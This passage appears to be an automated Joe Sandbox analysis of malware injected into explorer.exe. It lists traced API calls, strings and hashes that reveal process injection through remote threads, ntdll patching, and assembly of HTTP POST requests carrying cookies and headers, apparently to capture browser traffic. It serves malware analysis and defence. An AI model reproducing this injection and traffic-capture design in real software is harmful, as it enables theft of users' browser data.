                                                                                                                                                                                                                              • API ID: File$AttributesDelete
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2910425767-0
                                                                                                                                                                                                                              • Opcode ID: a5ae708bffd9248bf4838cb77aa8c1d6dd8fab3c6b2727349c9695defbc26df3
                                                                                                                                                                                                                              • Instruction ID: f718a0d1e2b0c3a72999eeb61b026ea6d9cff5e8a7baaacd6280788e30744e7b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5ae708bffd9248bf4838cb77aa8c1d6dd8fab3c6b2727349c9695defbc26df3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BDB09276003630ABD7113B55BA0EBCE2658EF0A211B050042F201A10488BA82B1286EA

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 323 3041000-3041010 GetProcessHeap RtlAllocateHeap
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0304100A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1357844191-0
                                                                                                                                                                                                                              • Opcode ID: 5228b5fcfe69dccbd590e310b229fffa950e6397f06cd156f054d3969c9e3420
                                                                                                                                                                                                                              • Instruction ID: d92171d03af683f828cf623e7d2d69856de8c7564fafa82fe5bc4c0736788b6a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5228b5fcfe69dccbd590e310b229fffa950e6397f06cd156f054d3969c9e3420
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60A002F99511105BDE4477E5BA0DB153518B744745F1485447146854449B7855348721
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03041274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 03041281
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,74DEE800), ref: 0304201A
                                                                                                                                                                                                                              • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 03042055
                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 030420E5
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,030450A0,00000016), ref: 0304210C
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 03042134
                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 03042144
                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 0304215E
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 03042166
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 03042174
                                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0304217B
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,atan), ref: 03042191
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 03042198
                                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 030421AE
                                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 030421D8
                                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 030421EB
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 030421F2
                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 030421F9
                                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 0304220D
                                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 03042224
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 03042231
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 03042237
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0304223D
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 03042240
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                                                                                                                              • String ID: atan$ntdll$opera_shared_counter
                                                                                                                                                                                                                              • API String ID: 1066286714-2737717697
                                                                                                                                                                                                                              • Opcode ID: 50df200d63e5745310e2177db9a77b5aa417d135e2252f5a1fc50ec3e3d95f8c
                                                                                                                                                                                                                              • Instruction ID: 413c4d823b33b8581f089255edece73d0a9162b3b44645cf7f963519516a899b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50df200d63e5745310e2177db9a77b5aa417d135e2252f5a1fc50ec3e3d95f8c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E461B2B5606304BFD310EF66CE84E6BBBECEB89750F040629F949D3241DB78DA058B61
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 030411A9
                                                                                                                                                                                                                              • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 030411C1
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000000), ref: 030411C9
                                                                                                                                                                                                                              • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 030411D4
                                                                                                                                                                                                                              • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 030411EE
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 03041205
                                                                                                                                                                                                                              • CryptDestroyHash.ADVAPI32(?), ref: 0304121E
                                                                                                                                                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 03041228
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                                                                                                                              • String ID: %02X
                                                                                                                                                                                                                              • API String ID: 3341110664-436463671
                                                                                                                                                                                                                              • Opcode ID: 04530965f1ae5ee3ee3f87571e89173eee69d6136abc9033ba5b1a4721f00685
                                                                                                                                                                                                                              • Instruction ID: e608ca03096db144fff35c04419cd3ad081614eddede7aca507f209b07f807b8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04530965f1ae5ee3ee3f87571e89173eee69d6136abc9033ba5b1a4721f00685
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF113DB9902108BFEB11AF9AED89FAEBBBCEB44301F1040A5FA05E2150D7754F559B60
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 030416D9
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 030416E1
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 030416F1
                                                                                                                                                                                                                              • Thread32First.KERNEL32(00000000,0000001C), ref: 030416FF
                                                                                                                                                                                                                              • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0304171E
                                                                                                                                                                                                                              • SuspendThread.KERNEL32(00000000), ref: 0304172E
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0304173D
                                                                                                                                                                                                                              • Thread32Next.KERNEL32(00000000,0000001C), ref: 0304174D
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 03041758
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1467098526-0
                                                                                                                                                                                                                              • Opcode ID: c4046203fdfde84bc6e23f1cd76188cbf13a3535875d873175118db16c87a11b
                                                                                                                                                                                                                              • Instruction ID: 4e3a0f138cdf9730e8bb3c5e4f18c4b3461205f7943f695658661124b714b164
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4046203fdfde84bc6e23f1cd76188cbf13a3535875d873175118db16c87a11b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA1170F640A200EBD711AF619A48B6FBBF8EF85701F040429F94592144D7388A99CBA3
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,03042EC5), ref: 03042E27
                                                                                                                                                                                                                                • Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
                                                                                                                                                                                                                                • Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A
                                                                                                                                                                                                                              • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 03042E52
                                                                                                                                                                                                                              • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 03042E7F
                                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,NetworkService), ref: 03042E92
                                                                                                                                                                                                                                • Part of subcall function 03041011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,030414CB), ref: 03041020
                                                                                                                                                                                                                                • Part of subcall function 03041011: RtlFreeHeap.NTDLL(00000000), ref: 03041027
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$Heap$InformationQuery$AllocateFreeOpen
                                                                                                                                                                                                                              • String ID: NetworkService
                                                                                                                                                                                                                              • API String ID: 1656241333-2019834739
                                                                                                                                                                                                                              • Opcode ID: 599e161fe9b941fa873fbdf6bcd67bcc947f57afd239218e675e089af3baa717
                                                                                                                                                                                                                              • Instruction ID: dbea0dcc62f3f1e6a4d4953c3357cdd8083052a94554fb67b89329f10661d6aa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 599e161fe9b941fa873fbdf6bcd67bcc947f57afd239218e675e089af3baa717
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F101B1F5302345BFD328BA279C44FAB7A9DEBCC292F014439B50AD6146DBB59A808620
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03041141: lstrlen.KERNEL32(?,?,?,00000000,?,030429DD,00000001), ref: 03041150
                                                                                                                                                                                                                                • Part of subcall function 03041141: lstrlen.KERNEL32(:method POST,?,00000000,?,030429DD,00000001), ref: 03041155
                                                                                                                                                                                                                                • Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
                                                                                                                                                                                                                                • Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A
                                                                                                                                                                                                                                • Part of subcall function 0304104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,03042A16,?,00000001), ref: 03041056
                                                                                                                                                                                                                                • Part of subcall function 0304285F: RtlMoveMemory.NTDLL(?,-00000001,-00000001), ref: 030428A2
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,dyn_header_host), ref: 03042A4A
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000001,dyn_header_path), ref: 03042A6C
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,dyn_header_ua), ref: 03042A8D
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,0000000A), ref: 03042A96
                                                                                                                                                                                                                              • StrToIntA.SHLWAPI(00000000), ref: 03042AB9
                                                                                                                                                                                                                              • wnsprintfA.SHLWAPI ref: 03042B0D
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 03042B2D
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,{:!:}), ref: 03042B35
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 03042B3C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$HeapMemorylstrlen$AllocAllocateMoveProcessVirtualZerownsprintf
                                                                                                                                                                                                                              • String ID: %s (HTTP2){:!:}%s%s{:!:}%s{:!:}$:authority $:method POST$:path $content-length $dyn_header_host$dyn_header_path$dyn_header_ua$host $user-agent ${:!:}
                                                                                                                                                                                                                              • API String ID: 2605944266-950501416
                                                                                                                                                                                                                              • Opcode ID: d93b687b92ef23716b3692e28dde388e3b8eb20b0464b1e8e22000659b36817a
                                                                                                                                                                                                                              • Instruction ID: efbda9f368a9726376afaa04ff9116d7f348f4e891c6602f454668f65ba3b68f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d93b687b92ef23716b3692e28dde388e3b8eb20b0464b1e8e22000659b36817a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0651C1F47063415FC719EF26C980B6EBBDAAFC8204F04086CF8459B246DB74DA458766
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03041141: lstrlen.KERNEL32(?,?,?,00000000,?,030429DD,00000001), ref: 03041150
                                                                                                                                                                                                                                • Part of subcall function 03041141: lstrlen.KERNEL32(:method POST,?,00000000,?,030429DD,00000001), ref: 03041155
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,0000000A), ref: 03042FFA
                                                                                                                                                                                                                              • StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,03043347), ref: 03043024
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,03043347), ref: 03043052
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 030430B9
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 030430E5
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,{:!:}), ref: 030430F8
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,03046038), ref: 03043109
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000), ref: 03043112
                                                                                                                                                                                                                                • Part of subcall function 03041011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,030414CB), ref: 03041020
                                                                                                                                                                                                                                • Part of subcall function 03041011: RtlFreeHeap.NTDLL(00000000), ref: 03041027
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
                                                                                                                                                                                                                              • String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
                                                                                                                                                                                                                              • API String ID: 2886538537-1627781280
                                                                                                                                                                                                                              • Opcode ID: 603e7c3f48131c703dbff64bbb401bb99e913c0c9b58d838c4f0f833ca6ea24d
                                                                                                                                                                                                                              • Instruction ID: d3e2abc29005bd3c8fe66573bf060995da6a3a32649870870ff72cca99149e68
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 603e7c3f48131c703dbff64bbb401bb99e913c0c9b58d838c4f0f833ca6ea24d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F31EEF93023452BD604EB269C55BAF369A9BC4B41F00443CF9028B286DBB99A4987A1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0304322D
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0304329E
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 030432AF
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,{:!:}), ref: 030432BE
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 030432C1
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,?), ref: 030432D2
                                                                                                                                                                                                                                • Part of subcall function 03041011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,030414CB), ref: 03041020
                                                                                                                                                                                                                                • Part of subcall function 03041011: RtlFreeHeap.NTDLL(00000000), ref: 03041027
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
                                                                                                                                                                                                                              • String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
                                                                                                                                                                                                                              • API String ID: 3430864794-1604029033
                                                                                                                                                                                                                              • Opcode ID: b2f8794dea17a3a93e6df835418d3926157d696b3bceefefc934d0f005ebf61c
                                                                                                                                                                                                                              • Instruction ID: 44a38d21163758eb05320862486057a13d388dc7f1664c18712e8987a11773c8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2f8794dea17a3a93e6df835418d3926157d696b3bceefefc934d0f005ebf61c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A54160B9105349AFD314EF11DD48FABBBECFB88345F04092DF54296141DB759A488BA2
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlEnterCriticalSection.NTDLL(03046038), ref: 03043455
                                                                                                                                                                                                                              • lstrcat.KERNEL32 ref: 030434AB
                                                                                                                                                                                                                                • Part of subcall function 03042FAA: RtlZeroMemory.NTDLL(?,0000000A), ref: 03042FFA
                                                                                                                                                                                                                                • Part of subcall function 03042FAA: StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,03043347), ref: 03043024
                                                                                                                                                                                                                                • Part of subcall function 03042FAA: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,03043347), ref: 03043052
                                                                                                                                                                                                                                • Part of subcall function 03042FAA: wsprintfA.USER32 ref: 030430B9
                                                                                                                                                                                                                                • Part of subcall function 03042FAA: lstrcat.KERNEL32(00000000,00000000), ref: 030430E5
                                                                                                                                                                                                                                • Part of subcall function 03042F1F: CreateThread.KERNEL32(00000000,00000000,03042ED2,?,00000000,00000000), ref: 03042F2F
                                                                                                                                                                                                                                • Part of subcall function 03042F1F: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 03042F36
                                                                                                                                                                                                                                • Part of subcall function 0304105D: VirtualFree.KERNEL32(?,00000000,00008000,03042B4B), ref: 03041065
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 03043504
                                                                                                                                                                                                                              • StrToIntA.SHLWAPI(?,00000000,?), ref: 0304352B
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 0304358D
                                                                                                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(03046038), ref: 030435C1
                                                                                                                                                                                                                                • Part of subcall function 03041274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 03041281
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Memory$CriticalSectionVirtualZerolstrcat$CloseCreateEnterFreeHandleLeaveMoveQueryThreadlstrlenwsprintf
                                                                                                                                                                                                                              • String ID: $Content-Length:$POST
                                                                                                                                                                                                                              • API String ID: 2960674810-114478848
                                                                                                                                                                                                                              • Opcode ID: 1df47961f3e3000c0f51ce6fcd2bfc47721532036ce534ff2834b6373d1f505d
                                                                                                                                                                                                                              • Instruction ID: 7f76097a8e75f7c8bf54e9dc36b3fee916b776f05a2a46a3d6311fef8a54a29b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1df47961f3e3000c0f51ce6fcd2bfc47721532036ce534ff2834b6373d1f505d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1731D8FC6073449BC715FF64E6547ABBBA9AB85201F0404BCE8128B345EB7A971C8B51
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
                                                                                                                                                                                                                                • Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A
                                                                                                                                                                                                                                • Part of subcall function 0304106C: lstrlen.KERNEL32(?,?,00000000,00000000,0304189F,74DE8A60,?,00000000), ref: 03041074
                                                                                                                                                                                                                                • Part of subcall function 0304106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 03041086
                                                                                                                                                                                                                                • Part of subcall function 030417DC: RtlZeroMemory.NTDLL(?,00000018), ref: 030417EE
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,0000003C), ref: 030418FB
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 030419F2
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 03041AD0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • Content-Type: application/x-www-form-urlencoded, xrefs: 03041A34
                                                                                                                                                                                                                              • Accept: */*Referer: %S, xrefs: 030419E8
                                                                                                                                                                                                                              • POST, xrefs: 030419A0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                                                                                                                              • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                                                                                                              • API String ID: 3833683434-704803497
                                                                                                                                                                                                                              • Opcode ID: 5cd8e3a0923a565d83820a71e8e598d9e9791961e6e2c54e205a4f7a5f49c0ed
                                                                                                                                                                                                                              • Instruction ID: 3219c97bb49e3c2ec032dd9d2dd5eae36cd7d30ed8e6d6d1c1eeb755b1b991d4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cd8e3a0923a565d83820a71e8e598d9e9791961e6e2c54e205a4f7a5f49c0ed
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 238198B920A340AFD314EF6AD884A6BBBE9EFC8344F04092DF545C7250EB75DA44CB52
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0304104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,03042A16,?,00000001), ref: 03041056
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 030425BB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,030442A8), ref: 030425C7
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 030425D6
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,030442AC), ref: 030425E5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$AllocVirtual
                                                                                                                                                                                                                              • String ID: :authority$?$dyn_header
                                                                                                                                                                                                                              • API String ID: 3028025275-1785586894
                                                                                                                                                                                                                              • Opcode ID: 10441f34e1fec8c2598e02ac18b509dab16aaae822d7d201d9e68f1e39586b02
                                                                                                                                                                                                                              • Instruction ID: 78711eadf5da1d3e3e7736861b497dcb08ed17c989463ea2a60dc3105a3e6d0e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10441f34e1fec8c2598e02ac18b509dab16aaae822d7d201d9e68f1e39586b02
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C261C4F570A3128BC710EE25D1907AEB7EEABD4251F440D7DF8815B282DB749B0D8B62
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03041141: lstrlen.KERNEL32(?,?,?,00000000,?,030429DD,00000001), ref: 03041150
                                                                                                                                                                                                                                • Part of subcall function 03041141: lstrlen.KERNEL32(:method POST,?,00000000,?,030429DD,00000001), ref: 03041155
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(?,?,-00000008), ref: 0304291B
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,030442BC), ref: 0304292A
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,74DE8A60,00000001,?,?,00000000,?,?,03042B26,?,?,?,?,00000001), ref: 0304295C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$MemoryMovelstrcat
                                                                                                                                                                                                                              • String ID: cookie
                                                                                                                                                                                                                              • API String ID: 2957667536-1295510418
                                                                                                                                                                                                                              • Opcode ID: a5d921f3dba4f55192ddebafd06c47e1ab69360797956cf95f54693f967620fb
                                                                                                                                                                                                                              • Instruction ID: 87aef6b85ebd4d4b206401b087bf8061cbe2f99f4b2f7c1361cb554c0278f9d8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5d921f3dba4f55192ddebafd06c47e1ab69360797956cf95f54693f967620fb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C211DFB23063065BC711EE98DC85BABB7EDDF80700F18093DF9019A241EBB1EA4A4390
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(?,?,?), ref: 03041E83
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,03046058,00000000,00000000,74DF2EE0,00000000,030420DC,?), ref: 03041EAB
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000002), ref: 03041ED8
                                                                                                                                                                                                                              • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 03041F29
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
